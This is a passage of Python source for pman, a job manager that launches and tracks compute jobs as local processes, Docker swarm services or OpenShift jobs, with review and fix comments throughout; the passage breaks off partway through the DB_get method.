        information on the status of jobs (both active and historical)
        that have been (or are currently) managed by pman.

        Originally, the concept of "job" only extended to a command
        line process spawned off on the underlying shell. With time,
        however, this concept expanded to encompass processes that
        are containerized.

        While most (if not all) of the use of pman currently is to
        handle containerized compute, the status determination logic
        still retains the ability to query simple spawned jobs.

        The determination about whether or not a job has been
        containerized is quite simple -- a token in the internal
        job "state" memory structure (the main pman stree "DB")
        is checked -- this initial chunk of data is returned by a
        call to self.job_state() which delivers a dictionary
        representation of the jobRoot in the DB tree.

        :param args:
        :param kwargs:
        :return: dictionary of components defining job state.
        """
        self.dp.qprint("------- In status process ------------")
        status = logs = currentState = ''
        if self.container_env == 'openshift':
            # Openshift path: delegate entirely to the openshift status helper.
            self.dp.qprint('------- Processing openshift status request -----------')
            try:
                d_containerStatus = self.t_status_process_openshift(*args, **kwargs)
                status = d_containerStatus['status']
                logs = d_containerStatus['logs']
                currentState = d_containerStatus['currentState']
            except Exception as e:
                # A missing openshift object maps to the 'Not Found' reason;
                # anything else is re-raised.
                if isinstance(e, ApiException) and e.reason == 'Not Found':
                    status = logs = currentState = e.reason
                else:
                    raise e
            d_ret = {
                'description': str(status),
                'l_logs': str(logs),
                'l_status': currentState
            }
            return {
                "d_ret": d_ret,
                "status": str(currentState)
            }
        else:
            d_state = self.job_state(*args, **kwargs)
            # {
            #     "hits": hits,
            #     "d_ret":
            #         [<index>+'.container'] = {
            #               "jobRoot": job, "tree": dict(T_container.snode_root)
            #         },
            #     "status": b_status
            # }
            d_ret = d_state['d_ret']
            b_status = d_state['status']
            d_keys = d_ret.items()
            l_status = []
            l_logs = []
            #
            # The d_ret keys consist of groups of
            #
            #       *.start
            #       *.end
            #       *.container
            #
            # thus the loop grouping is number of items / 3
            #
            if '0.start' in d_ret:
                for i in range(0, int(len(d_keys)/3)):
                    try:
                        b_startEvent = d_ret['%s.start' % str(i)]['startTrigger'][0]
                    except:
                        b_startEvent = False
                    try:
                        endcode = d_ret['%s.end' % str(i)]['returncode'][0]
                    except:
                        endcode = None

                    # Was this a containerized job?
                    found_container = False
                    container_path = '%s.%s' % (str(i), 'container')
                    if container_path in d_state['d_ret'] and \
                       d_state['d_ret'][container_path]['tree'] and \
                       b_startEvent:
                        kwargs['d_state'] = d_state
                        kwargs['hitIndex'] = str(i)
                        str_methodSuffix = None
                        if self.container_env == 'swarm':
                            # append suffix _container to redirect to container function
                            str_methodSuffix = 'container'
                        # NOTE(review): dynamic dispatch via eval() on an
                        # internally-built string; suffix comes from internal
                        # state, not client input, but a getattr() lookup
                        # would be safer — flagging for review.
                        d_containerStatus = eval("self.t_status_process_%s(*args, **kwargs)" % str_methodSuffix)
                        # d_ret {
                        #   'status':       d_ret['status'],            # bool
                        #   'logs':         str_logs,                   # logs from app in container
                        #   'currentState': d_ret['d_process']['state'] # string of 'finishedSuccessfully' etc
                        # }
                        l_status.append(d_containerStatus['currentState'])
                        l_logs.append(d_containerStatus['logs'])
                        found_container = True

                    # The case for non-containerized jobs
                    if not found_container:
                        if endcode is None and not b_startEvent:
                            l_status.append('notstarted')
                        if endcode is None and b_startEvent:
                            l_status.append('started')
                        if not endcode and b_startEvent and type(endcode) is int:
                            l_status.append('finishedSuccessfully')
                        if endcode and b_startEvent:
                            l_status.append('finishedWithError')
                    self.dp.qprint('b_startEvent = %d' % b_startEvent)
                    self.dp.qprint(endcode)
                    self.dp.qprint('l_status = %s' % l_status)
            d_ret['l_status'] = l_status
            d_ret['l_logs'] = l_logs
            return {
                "d_ret": d_ret,
                "status": b_status
            }
def DB_store(self, data, str_path, str_file):
    """
    Store <data> at <str_path>/<str_file> in the in-memory DB tree.

    The path/file split is kept explicit purely to make the existence
    check on the memory tree straightforward. A DB save event is
    triggered unconditionally afterwards.
    """
    tree = self.within.ptree
    if not tree.exists(str_file, path = str_path):
        tree.touch('%s/%s' % (str_path, str_file), data)
    # Persist the (possibly updated) DB state to backing storage.
    self.within.DB_fileIO(cmd = 'save')
def t_status_process_container_stateObject(self, *args, **kwargs):
    """
    Process the swarm manager state object and, if necessary, shut the
    service down on the swarm scheduler.

    kwargs:
        jobState     : job-state dictionary (contains 'd_ret' and 'hits')
        serviceState : raw state object returned by the swarm manager
        hitIndex     : index (string) of the job hit being processed
        logs         : stdout/stderr captured from the container

    PRECONDITIONS:
    o This method should only ever be called by t_status_process_container().

    POSTCONDITIONS:
    o A dict {'status': True, 'd_process': <state-processing result>} is
      returned.
    o If state is complete and service still running, the state object
      and logs are saved to the internal DB tree and the service removed.
    """
    def service_exists(str_serviceName):
        """
        Return True if a docker service named <str_serviceName> exists,
        False otherwise.
        """
        b_exists = False
        client = docker.from_env()
        try:
            service = client.services.get(str_serviceName)
            b_exists = True
        except:
            # NOTE(review): bare except -- any docker-client failure
            # (not just "no such service") is reported as non-existence.
            b_exists = False
        return b_exists

    def service_shutDown_check():
        """
        Verify that a docker service can be shut down.

        Should multiple jobs have been scheduled temporally serially
        with the same jid/serviceName, then the actual service can
        only be shut down once all identical jobs have had their
        state stored.

        Returns True when <str_hitIndex> is the last hit, else False.

        NOTE(review): defined here but never called in this method.
        """
        ret = False
        if int(str_hitIndex) < int(d_jobState['hits'])-1:
            ret = False
        else:
            ret = True
        return ret

    def service_shutDown(d_serviceInfo):
        """
        Shut down a service by running the manager image with its
        '--remove <serviceName>' command (docker socket bind-mounted
        into the manager container).
        """
        client = docker.from_env()
        str_cmdShutDown = '%s --remove %s' % \
            (d_serviceInfo['managerApp'], d_serviceInfo['serviceName'])
        byte_str = client.containers.run(
            '%s' % d_serviceInfo['managerImage'],
            str_cmdShutDown,
            volumes = {
                '/var/run/docker.sock':
                {
                    'bind': '/var/run/docker.sock',
                    'mode': 'rw'
                }
            },
            remove = True)
        return byte_str

    d_serviceState = None
    d_jobState = None
    str_hitIndex = "0"
    str_logs = ""
    for k, v in kwargs.items():
        if k == 'jobState':     d_jobState = v
        if k == 'serviceState': d_serviceState = v
        if k == 'hitIndex':     str_hitIndex = v
        if k == 'logs':         str_logs = v
    if d_serviceState:
        # Fold the raw service state into the job's final state; this also
        # persists state/logs to the DB tree when the job has finished.
        d_ret = self.t_status_process_state(**kwargs)
        # d_ret {
        #   'currentState': str_currentState,
        #   'removeJob':    b_removeJob,
        #   'status':       True
        # }
        if d_ret['removeJob']:
            # Job finished: locate its container info in the DB tree and
            # remove the (still running) swarm service.
            str_jobRoot = d_jobState['d_ret']['%s.container' % (str_hitIndex)]['jobRoot']
            self.within.ptree.cd('/%s/container' % str_jobRoot)
            d_serviceInfo = {
                'serviceName':  self.within.ptree.cat('manager/env/serviceName'),
                'managerImage': self.within.ptree.cat('manager/image'),
                'managerApp':   self.within.ptree.cat('manager/app')
            }
            if service_exists(d_serviceInfo['serviceName']):
                service_shutDown(d_serviceInfo)
    # NOTE(review): if 'serviceState' is falsy, d_ret is never bound and
    # this return raises NameError -- callers always pass a serviceState.
    return {
        'status':    True,
        'd_process': d_ret
    }
def t_status_process_container(self, *args, **kwargs):
    """
    Execution should only reach this method for "container"ized jobs
    status determination!

    The 'd_state' kwarg contains a dictionary representation of the
    container DB tree.

    PRECONDITIONS:
    o Only call this method if a container structure exists
      in the relevant job tree!

    POSTCONDITIONS:
    o If the job is completed, then the container cluster service is
      shut down (via the stateObject handler).
    o The memory container tree contains a dictionary called 'state'
      that is the state returned by the container service, as well as
      a file called 'logs' that is the stdout/stderr generated by the
      job as it ran in the container.
    """
    d_state = None
    str_jobRoot = ''
    str_hitIndex = "0"
    str_logs = ''
    for k, v in kwargs.items():
        if k == 'd_state':  d_state = v
        if k == 'hitIndex': str_hitIndex = v
    self.dp.qprint('checking on status using container...')
    # Resolve the job's root node and its manager parameters from the tree
    str_jobRoot = d_state['d_ret']['%s.container' % str_hitIndex]['jobRoot']
    self.within.ptree.cd('/%s/container' % str_jobRoot)
    str_serviceName = self.within.ptree.cat('manager/env/serviceName')
    str_managerImage = self.within.ptree.cat('manager/image')
    str_managerApp = self.within.ptree.cat('manager/app')
    # Check if the state of the container service has been recorded to the data tree
    if self.within.ptree.exists('state', path = '/%s/container' % str_jobRoot):
        # If this exists, then the job has actually completed and
        # its state has been recorded in the data tree. We can simply 'cat'
        # the state from this memory dictionary
        d_serviceState = self.within.ptree.cat('/%s/container/state' % str_jobRoot)
        if self.within.ptree.exists('logs', path = '/%s/container' % str_jobRoot):
            # The job has actually completed and its logs are recorded in the data tree
            str_logs = self.within.ptree.cat('/%s/container/logs' % str_jobRoot)
    else:
        # Here, the manager has not been queried yet about the state of
        # the service. We need to ask the container service for this
        # state, and then record the state (and logs) in the memory
        # tree, and then "shut down" the service.
        client = docker.from_env()
        # Get the state of the service by running the manager image with
        # '--state <serviceName>' (docker socket bind-mounted in).
        str_cmdManager = '%s --state %s' % \
            (str_managerApp, str_serviceName)
        byte_str = client.containers.run(
            '%s' % str_managerImage,
            str_cmdManager,
            volumes = {
                '/var/run/docker.sock':
                {
                    'bind': '/var/run/docker.sock',
                    'mode': 'rw'
                }
            },
            remove = True)
        d_serviceState = json.loads(byte_str.decode())
        # Now, parse for the logs of the actual container run by the service:
        # NB: This has only really been tested/used on swarm!!
        b_containerIDFound = True
        try:
            str_contID = d_serviceState['Status']['ContainerStatus']['ContainerID']
            b_containerIDFound = True
        except:
            # State object carries no container ID (e.g. not scheduled yet)
            b_containerIDFound = False
        if b_containerIDFound:
            container = client.containers.get(str_contID)
            str_logs = container.logs()
            str_logs = str_logs.decode()
    # Fold state/logs into the final verdict; persists + shuts down service
    # when the job has finished.
    d_ret = self.t_status_process_container_stateObject(
        hitIndex = str_hitIndex,
        jobState = d_state,
        serviceState = d_serviceState,
        logs = str_logs
    )
    # d_ret {
    #   'status': bool,
    #   'd_process': {
    #       'currentState': str_currentState,
    #       'removeJob':    b_removeJob,
    #       'status':       True
    #   }
    # }
    return {
        'status':       d_ret['status'],
        'logs':         str_logs,
        'currentState': d_ret['d_process']['currentState']
    }
def t_delete_process(self, *args, **kwargs):
    """
    Delete an existing job.

    Currently only the OpenShift container environment is handled (via
    t_delete_process_openshift()); other environments fall through and
    return an empty job_id/status.

    :return: dict with 'd_ret' (action / job_id / status) and 'status'.
    """
    status = jid = ''
    if self.container_env == 'openshift':
        self.dp.qprint('Processing openshift....')
        try:
            d_containerStatus = self.t_delete_process_openshift(*args, **kwargs)
            status = d_containerStatus['status']
            jid = d_containerStatus['jid']
        except Exception as e:
            # Only a "Not Found" error (job already gone) is tolerated;
            # everything else propagates. getattr() guards against
            # exceptions that carry no 'reason' attribute at all -- the
            # previous bare `e.reason` access itself raised
            # AttributeError for such exceptions, masking the original
            # error. (The old dead `logs = currentState =` assignments
            # are dropped.)
            if getattr(e, 'reason', None) == 'Not Found':
                status = e.reason
            else:
                raise
    d_ret = {
        'action' : 'Delete Job',
        'job_id' : jid,
        'status' : status
    }
    return {
        "d_ret":  d_ret,
        "status": status
    }
def t_delete_process_openshift(self, *args, **kwargs):
    """
    Remove a job and its related resources (pods & pvc) from OpenShift.

    The job id is taken from the 'request' kwarg when its action is
    'delete'. If OpenShift reports the job as 'Not Found' that status
    is returned verbatim; otherwise the job and its PVC are removed.
    """
    jid = None
    d_request = kwargs.get('request')
    if d_request is not None and d_request['action'] == 'delete':
        jid = d_request['meta']['value']
    mgr = self.get_openshift_manager()
    d_json = mgr.state(jid)
    if d_json['Status'] == 'Not Found':
        status = d_json['Status']
    else:
        mgr.remove_job(jid)
        mgr.remove_pvc(jid)
        status = 'Job deleted successfully'
    return {
        "jid"    : jid,
        "status" : status
    }
def t_status_process_openshift(self, *args, **kwargs):
    """
    Determine the status of a job scheduled using the openshift manager.

    PRECONDITIONS:
    o Only call this method if a container structure exists
      in the relevant job tree!

    POSTCONDITIONS:
    o If the job is finished, the logs of all its pods are collected;
      otherwise the status message itself is returned as the "logs".
    """
    self.dp.qprint('------- Processing job status within t_status_process_openshift ----------- ')
    str_logs = ''
    # Get job-id from request
    # NOTE(review): if no 'request' kwarg with action 'status' is passed,
    # 'jid' is never bound and the state() call below raises NameError.
    for k, v in kwargs.items():
        if k == 'request' and v['action'] == 'status': jid = v['meta']['value']
    # Query OpenShift API to get job state
    d_json = self.get_openshift_manager().state(jid)
    if d_json['Status']['Message'] == 'finished':
        # Collect logs from every pod that ran for this job
        pod_names = self.get_openshift_manager().get_pod_names_in_job(jid)
        for _, pod_name in enumerate(pod_names):
            str_logs += self.get_openshift_manager().get_job_pod_logs(pod_name, jid)
    else:
        str_logs = d_json['Status']['Message']
    status = d_json['Status']
    currentState = d_json['Status']['Message']
    return {
        'status': status,
        'logs': str_logs,
        'currentState': [currentState]
    }
def t_status_process_openshift_stateObject(self, *args, **kwargs):
    """
    Process the actual JSON container return object on service state.

    kwargs:
        jobState     : job-state dictionary (contains 'd_ret')
        serviceState : raw state object from OpenShift
        hitIndex     : index (string) of the job hit being processed
        logs         : captured job logs

    PRECONDITIONS:
    o This method should only ever be called by t_status_process_openshift().

    POSTCONDITIONS:
    o A dict {'status': True, 'd_process': <state-processing result>} is
      returned; when the job has finished, its OpenShift job and PVC are
      removed.
    """
    def job_exists(jid):
        """
        Return True if an OpenShift job <jid> exists, False otherwise.
        """
        b_exists = False
        try:
            job = self.get_openshift_manager().get_job(jid)
            b_exists = True
        except:
            # NOTE(review): bare except -- any API failure is treated
            # as "job does not exist".
            b_exists = False
        return b_exists

    def job_shutDown(d_serviceInfo):
        """
        Shut down a job: remove its PVC and then the job itself.

        NOTE(review): the d_serviceInfo parameter is unused -- the
        closure variable 'jid' (bound in the caller scope below) is
        what actually gets removed.
        """
        try:
            self.get_openshift_manager().remove_pvc(jid)
            self.get_openshift_manager().remove_job(jid)
        except Exception as err:
            self.dp.qprint("Error deleting pvc/job:", err)

    d_serviceState = None
    d_jobState = None
    str_hitIndex = "0"
    str_logs = ""
    d_ret = {}
    for k, v in kwargs.items():
        if k == 'jobState':     d_jobState = v
        if k == 'serviceState': d_serviceState = v
        if k == 'hitIndex':     str_hitIndex = v
        if k == 'logs':         str_logs = v
    if d_serviceState:
        # Fold the raw service state into the job's final state
        d_ret = self.t_status_process_state(**kwargs)
        if d_ret['removeJob']:
            # Job finished: look up its jid in the DB tree and clean up
            str_jobRoot = d_jobState['d_ret']['%s.container' % (str_hitIndex)]['jobRoot']
            self.within.ptree.cd('/%s' % str_jobRoot)
            jid = self.within.ptree.cat('jid')
            if job_exists(jid):
                job_shutDown(jid)
    return {
        'status': True,
        'd_process': d_ret
    }
def get_openshift_manager(self):
    """
    Return the cached OpenShiftManager, creating it on first use.
    """
    mgr = self.openshiftmgr
    if not mgr:
        mgr = OpenShiftManager()
        self.openshiftmgr = mgr
    return mgr
def t_status_process_state(self, *args, **kwargs):
    """
    Process the swarm state object to make the final determination on a
    job's state, print out container job state and logs, and signal the
    caller (via 'removeJob') to remove the job from the swarm scheduler
    once it has completed.

    kwargs:
        jobState     : job-state dictionary (contains 'd_ret')
        serviceState : raw state object returned by the scheduler
        hitIndex     : index (string) of the job hit being processed
        logs         : stdout/stderr captured from the container

    :return: dict with 'currentState', 'removeJob', 'status'.
    """
    def debug_print(str_jobRoot,
                    d_serviceState,
                    str_currentState,
                    str_logs):
        """
        Print some useful debug info; jobs that finished with an error
        are reported on the 'error' comms channel.
        """
        l_commsNorm = ['rx', 'rx', 'tx']
        l_commsErr  = ['error', 'error', 'error']
        l_comms = l_commsNorm
        if str_currentState == 'finishedWithError':
            l_comms = l_commsErr
        self.dp.qprint('\njobRoot %s\n-->%s<--...' % \
                       (str_jobRoot,
                        str_currentState),
                       comms = l_comms[0])
        self.dp.qprint('\n%s' % self.df_print(d_serviceState),
                       comms = l_comms[1])
        self.dp.qprint('\njob logs:\n%s' % str_logs,
                       comms = l_comms[2])

    d_serviceState   = {}
    d_jobState       = {}
    str_hitIndex     = "0"
    str_logs         = ""
    b_status         = False
    str_currentState = "undefined"
    for k, v in kwargs.items():
        if k == 'jobState':     d_jobState = v
        if k == 'serviceState': d_serviceState = v
        if k == 'hitIndex':     str_hitIndex = v
        if k == 'logs':         str_logs = v
    b_removeJob = False
    # FIX: the jobRoot lookup previously used a hard-coded local
    # `hitIndex = 0`, silently ignoring the 'hitIndex' kwarg that was
    # parsed into str_hitIndex above -- every call resolved to
    # '0.container'. Use the passed index, consistent with the sibling
    # *_stateObject methods that supply hitIndex=str(i).
    str_jobRoot = d_jobState['d_ret']['%s.container' % (str_hitIndex)]['jobRoot']
    str_state   = d_serviceState['Status']['State']
    str_message = d_serviceState['Status']['Message']
    if str_state == 'running' and str_message == 'started':
        str_currentState = 'started'
        debug_print(str_jobRoot, d_serviceState, str_currentState, str_logs)
        b_status = True
    else:
        # Job is no longer running: persist its state and logs to the DB
        # tree and flag it for removal from the scheduler.
        self.DB_store(d_serviceState, '/%s/container' % (str_jobRoot), 'state')
        self.DB_store(str_logs, '/%s/container' % (str_jobRoot), 'logs')
        b_removeJob = True
        if str_state == 'failed' and str_message == 'started':
            str_currentState = 'finishedWithError'
            debug_print(str_jobRoot, d_serviceState, str_currentState, str_logs)
        elif str_state == 'complete' and str_message == 'finished':
            str_currentState = 'finishedSuccessfully'
            debug_print(str_jobRoot, d_serviceState, str_currentState, str_logs)
            b_status = True
        self.DB_store(str_currentState, '/%s/container' % (str_jobRoot), 'currentState')
    if str_currentState == 'undefined':
        # Neither the running nor any finished pattern matched.
        self.dp.qprint('The state of the job is undefined!', comms = 'error')
        self.dp.qprint('This typically means that the scheduler rejected the job.', comms = 'error')
        self.dp.qprint('jobRoot = %s' % str_jobRoot, comms = 'error')
    return {
        'currentState': str_currentState,
        'removeJob':    b_removeJob,
        'status':       b_status
    }
def t_hello_process(self, *args, **kwargs):
    """
    Answer a 'hello' probe from a client.

    A lightweight way of checking the server is "up": depending on the
    'askAbout' field in the request meta, return the current timestamp,
    a system-information snapshot, or echo a message back. The server
    name and version are always included when 'askAbout' is present.

    :param args:   unused
    :param kwargs: expects 'request' carrying the client payload
    :return: dict with 'd_ret' payload and boolean 'status'
    """
    self.dp.qprint("In hello process...")
    b_status = False
    d_ret = {}
    for k, v in kwargs.items():
        if k == 'request': d_request = v
    d_meta = d_request['meta']
    if 'askAbout' in d_meta.keys():
        str_askAbout = d_meta['askAbout']
        d_ret['name'] = self.within.str_name
        d_ret['version'] = self.within.str_version
        if str_askAbout == 'timestamp':
            # Current server wall-clock time
            str_now = datetime.datetime.today().strftime('%Y%m%d%H%M%S.%f')
            d_ret['timestamp'] = {'now': str_now}
            b_status = True
        if str_askAbout == 'sysinfo':
            # Snapshot of host platform / load information
            d_sys = {}
            d_sys['system']      = platform.system()
            d_sys['machine']     = platform.machine()
            d_sys['platform']    = platform.platform()
            d_sys['uname']       = platform.uname()
            d_sys['version']     = platform.version()
            d_sys['memory']      = psutil.virtual_memory()
            d_sys['cpucount']    = multiprocessing.cpu_count()
            d_sys['loadavg']     = os.getloadavg()
            d_sys['cpu_percent'] = psutil.cpu_percent()
            d_sys['hostname']    = socket.gethostname()
            # Best-effort determination of a non-loopback IP address
            d_sys['inet'] = [l for l in ([ip for ip in socket.gethostbyname_ex(socket.gethostname())[2] if not ip.startswith("127.")][:1], [[(s.connect(('8.8.8.8', 53)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]]) if l][0][0]
            d_ret['sysinfo'] = d_sys
            b_status = True
        if str_askAbout == 'echoBack':
            d_ret['echoBack'] = {'msg': d_meta['echoBack']}
            b_status = True
    return { 'd_ret': d_ret,
             'status': b_status}
def t_run_process(self, *args, **kwargs):
    """
    Main job handler -- this is in turn a thread spawned from the
    parent listener thread.

    By being threaded, the client http caller gets an immediate
    response without needing to wait on the jobs actually running
    to completion.

    kwargs:
        request  : the client request dict (its 'meta' carries jid,
                   auid and the command line to run)
        treeList : optional dict of {name: C_stree} trees to persist
                   alongside the job entry (used by the container path)
    """
    str_cmd = ""
    d_request = {}
    d_meta = {}
    d_Tcontainer = {}
    for k, v in kwargs.items():
        if k == 'request':  d_request = v
        if k == 'treeList': d_Tcontainer = v
    d_meta = d_request['meta']
    if d_meta:
        self.jid = d_meta['jid']
        self.auid = d_meta['auid']
        str_cmd = d_meta['cmd']
    # Normalise numeric job ids to strings for tree path use
    if isinstance(self.jid, int):
        self.jid = str(self.jid)
    self.dp.qprint("spawning and starting poller thread")
    # Start the 'poller' worker, which runs the actual command and
    # reports job start/end events back through its queues.
    self.poller = Poller(cmd = str_cmd,
                         debugToFile = self.b_debugToFile,
                         verbosity = self.verbosity,
                         debugFile = self.str_debugFile)
    self.poller.start()
    # Job root dir name: timestamp + uuid guarantees uniqueness
    str_timeStamp = datetime.datetime.today().strftime('%Y%m%d%H%M%S.%f')
    str_uuid = uuid.uuid4()
    str_dir = '%s_%s' % (str_timeStamp, str_uuid)
    self.str_jobRootDir = str_dir
    b_jobsAllDone = False
    p = self.within.ptree
    p.cd('/')
    p.mkcd(str_dir)
    if d_Tcontainer:
        # Save the trees in this list to the DB...
        for name, tree in d_Tcontainer.items():
            p.mkcd(name)
            tree.copy(startPath = '/', destination = p, pathDiskRoot = '/%s/%s' % (str_dir, name))
            p.cd('/%s' % str_dir)
    # Record the job's metadata in its tree node
    p.touch('d_meta', json.dumps(d_meta))
    for detailKey in ['cmdMgr', 'cmdMgr_byte_str']:
        if detailKey in d_meta.keys():
            p.touch(detailKey, json.dumps(d_meta[detailKey]))
    p.touch('cmd', str_cmd)
    if len(self.auid):
        p.touch('auid', self.auid)
    if len(self.jid):
        p.touch('jid', self.jid)
    p.mkdir('start')
    p.mkdir('end')
    jobCount = 0
    p.touch('jobCount', jobCount)
    # Drain the poller's queues: each (compound) job produces one start
    # and one end info record, stored under start/<n> and end/<n>.
    while not b_jobsAllDone:
        try:
            b_jobsAllDone = self.poller.queueAllDone.get_nowait()
        except queue.Empty:
            self.dp.qprint('Waiting on start job info')
            d_startInfo = self.poller.queueStart.get()
            str_startDir = '/%s/start/%d' % (self.str_jobRootDir, jobCount)
            p.mkdir(str_startDir)
            p.cd(str_startDir)
            p.touch('startInfo', d_startInfo.copy())
            # Also keep the latest start info at the job root
            p.touch('/%s/startInfo' % str_dir, d_startInfo.copy())
            self.dp.qprint('Waiting on end job info')
            d_endInfo = self.poller.queueEnd.get()
            str_endDir = '/%s/end/%d' % (self.str_jobRootDir, jobCount)
            p.mkdir(str_endDir)
            p.cd(str_endDir)
            p.touch('endInfo', d_endInfo.copy())
            # Also keep the latest end info / running job count at the root
            p.touch('/%s/endInfo' % str_dir, d_endInfo.copy())
            p.touch('/%s/jobCount' % str_dir, jobCount)
            jobCount += 1
    self.dp.qprint('All jobs processed.')
    # Save DB state...
    self.within.ptree = p
    self.within.DB_fileIO(cmd = 'save')
def FScomponent_pollExists(self, *args, **kwargs):
    """
    Poll for the existence of a file-system component (file or dir).

    Used to ride out transients when an asynchronous process is still
    creating a component that pman wants to access. Sleeps 2s between
    attempts.

    kwargs:
        maxLoopTries : maximum number of polling attempts (default 20)
        dir          : the file-system path to poll for

    :return: True if the component appeared, False otherwise.
    """
    maxLoopTries = kwargs.get('maxLoopTries', 20)
    str_dir = kwargs.get('dir', '')
    attempt = 1
    while True:
        self.dp.qprint('Checking if %s exists (currentLoop: %d)...' % (str_dir, attempt), comms = 'rx')
        if os.path.exists(str_dir):
            self.dp.qprint('Dir exists!', comms = 'rx')
            return True
        self.dp.qprint('Dir does not exist! Sleeping...', comms = 'error')
        time.sleep(2)
        attempt += 1
        if attempt == maxLoopTries:
            return False
def t_run_process_container(self, *args, **kwargs):
    """
    A threaded run method specialized to handling containerized managers
    and targets (swarm).

    NOTE: If 'serviceName' is not specified/present, then this defaults
    to the 'jid' value and is in fact the default behaviour.

    Typical JSON d_request:
        { "action": "run",
          "meta": {
            "cmd": "$execshell $selfpath/$selfexec --prefix test- --sleepLength 0 /share/incoming /share/outgoing",
            "auid": "rudolphpienaar",
            "jid": "simpledsapp-1",
            "threaded": true,
            "container": {
                "target": {
                    "image": "fnndsc/pl-simpledsapp"
                },
                "manager": {
                    "image": "fnndsc/swarm",
                    "app": "swarm.py",
                    "env": {
                        "shareDir": "/home/tmp/share",
                        "serviceType": "docker",
                        "serviceName": "testService"
                    }
                }
            }
          }
        }
    """
    str_cmd = ""
    str_shareDir = ""
    str_serviceName = ""
    d_request = {}
    d_meta = {}
    d_container = {}
    d_manager = {}
    d_env = {}
    # FIX: pre-initialize so the cmdMgr bookkeeping below cannot raise
    # NameError when client.containers.run() throws (previously byte_str
    # was only ever bound inside the try block).
    byte_str = b''
    self.dp.qprint('Processing swarm-type job...')
    for k, v in kwargs.items():
        if k == 'request': d_request = v
    d_meta = d_request['meta']
    if d_meta:
        self.jid = d_meta['jid']
        self.auid = d_meta['auid']
        str_cmd = d_meta['cmd']
        # The swarm service name defaults to the job id
        str_serviceName = self.jid
        if 'container' in d_meta.keys():
            d_container = d_meta['container']
            d_target = d_container['target']
            str_targetImage = d_target['image']
            d_manager = d_container['manager']
            str_managerImage = d_manager['image']
            str_managerApp = d_manager['app']
            d_env = d_manager['env']
            if 'shareDir' in d_env.keys():
                str_shareDir = d_env['shareDir']
                # Remove trailing '/' if it exists in shareDir
                str_shareDir = str_shareDir.rstrip('/')
                # Wait out transients while the share dir is being created
                b_exists = self.FScomponent_pollExists(dir = str_shareDir)
                if not b_exists:
                    self.dp.qprint('Could not access volume mapped share dir: %s' % str_shareDir, comms = 'error')
                if 'STOREBASE' in os.environ:
                    # Re-root the share dir under STOREBASE, keeping its key
                    str_storeBase = os.environ['STOREBASE']
                    (str_origBase, str_key) = os.path.split(str_shareDir)
                    self.dp.qprint('Overriding shareDir (orig): %s' % str_shareDir)
                    str_shareDir = os.path.join(str_storeBase, str_key)
                    self.dp.qprint('Overriding shareDir (new): %s' % str_shareDir)
            if 'serviceName' in d_env.keys():
                str_serviceName = d_env['serviceName']
            else:
                d_env['serviceName'] = str_serviceName
            # First, attach to the docker daemon...
            client = docker.from_env()
            str_cmdLine = str_cmd
            str_cmdManager = '%s -s %s -m %s -i %s -p none -c "%s"' % \
                (str_managerApp, str_serviceName, str_shareDir, str_targetImage, str_cmdLine)
            try:
                byte_str = client.containers.run('%s' % str_managerImage,
                                                 str_cmdManager,
                                                 volumes = {'/var/run/docker.sock': {'bind': '/var/run/docker.sock', 'mode': 'rw'}},
                                                 remove = True)
            except Exception as e:
                # An exception here most likely occurs due to a serviceName
                # collision. Solution is to stop the service and retry.
                str_e = '%s' % e
                print(str_e)
            d_meta['cmdMgr'] = '%s %s' % (str_managerImage, str_cmdManager)
            # FIX: key was misspelled 'cmdMrg_byte_str'; t_run_process()
            # persists only 'cmdMgr' / 'cmdMgr_byte_str', so the manager
            # output was previously dropped silently.
            d_meta['cmdMgr_byte_str'] = str(byte_str, 'utf-8')
            # Call the "parent" method -- reset the cmdLine to an "echo"
            # and create an stree off the 'container' dictionary to store
            # in the pman DB entry.
            d_meta['cmd'] = 'echo "%s"' % str_cmd
            T_container = C_stree()
            T_container.initFromDict(d_container)
            d_Tcontainer = {'container': T_container}
            self.t_run_process(request = d_request,
                               treeList = d_Tcontainer)
    self.dp.qprint('Returning from swarm-type job...')
def t_run_process_openshift(self, *args, **kwargs):
    """
    A threaded run method specialized for handling openshift.

    Schedules the target image on OpenShift with the resource limits
    given in the request meta (workers / cpu / memory / gpu), creating
    a shared PVC first when STORAGE_TYPE is 'swift'.
    """
    self.dp.qprint('Processing openshift job...')
    d_request = {}
    for k, v in kwargs.items():
        if k == 'request': d_request = v
    d_meta = d_request['meta']
    if d_meta:
        self.jid = d_meta['jid']
        self.auid = d_meta['auid']
        str_cmd = d_meta['cmd']
        # TODO: Currently it is assumed that incoming and outgoing dir will always be the last two args.
        # It holds true for 'ds' plugins but not for 'fs' plugins.
        # Implementation to support both fs and ds plugins should be incorporated.
        l_args = str_cmd.split()
        incoming_dir = l_args[-2]
        outgoing_dir = l_args[-1]
        # Resource limits, with conservative defaults
        number_of_workers = d_meta.get('number_of_workers', '1')
        cpu_limit = d_meta.get('cpu_limit', '2000m')
        memory_limit = d_meta.get('memory_limit', '1024Mi')
        gpu_limit = d_meta.get('gpu_limit', 0)
        if 'container' in d_meta:
            str_targetImage = d_meta['container']['target']['image']
        # Create the Persistent Volume Claim
        if os.environ.get('STORAGE_TYPE') == 'swift':
            self.dp.qprint("Creating shared PVC")
            self.get_openshift_manager().create_pvc(self.jid)
        self.get_openshift_manager().schedule(
            str_targetImage, str_cmd, self.jid,
            number_of_workers, cpu_limit, memory_limit, gpu_limit,
            incoming_dir, outgoing_dir)
    self.dp.qprint('Returning from openshift job...')
def json_filePart_get(self, **kwargs):
    """
    If the requested path is *within* a json "file" on the
    DB, then we need to find the file, and map the relevant
    path to components in that file.

    NOTE(review): this is an unimplemented stub -- the body consists of
    this docstring only and the method returns None. The file-mapping
    logic it describes currently lives inline in DB_get().
    """
def DB_get(self, **kwargs):
    """
    Return part of the DB tree based on the path spec in the URL.

    kwargs:
        path : the request URL path ('/api/v1/<job>/...')

    Hidden behaviour: if the job component of the path starts with an
    underscore, it is interpreted as a numeric offset into the job list
    ('/_2/...' maps to the third job), a shorthand for indexed access.

    :return: dict representation of the extracted subtree, or False on
             an invalid job offset.
    """
    r = C_stree()
    p = self.within.ptree
    pcwd = p.cwd()
    str_URLpath = "/api/v1/"
    for k, v in kwargs.items():
        if k == 'path': str_URLpath = v
    # Strip the '/api/v1' prefix, leaving the in-tree path
    str_path = '/' + '/'.join(str_URLpath.split('/')[3:])
    self.dp.qprint("path = %s" % str_path)
    if str_path == '/':
        # If root node, only return list of jobs
        l_rootdir = p.lstr_lsnode(str_path)
        r.mknode(l_rootdir)
    else:
        # Here is a hidden behaviour. If the 'root' dir starts
        # with an underscore, then replace that component of
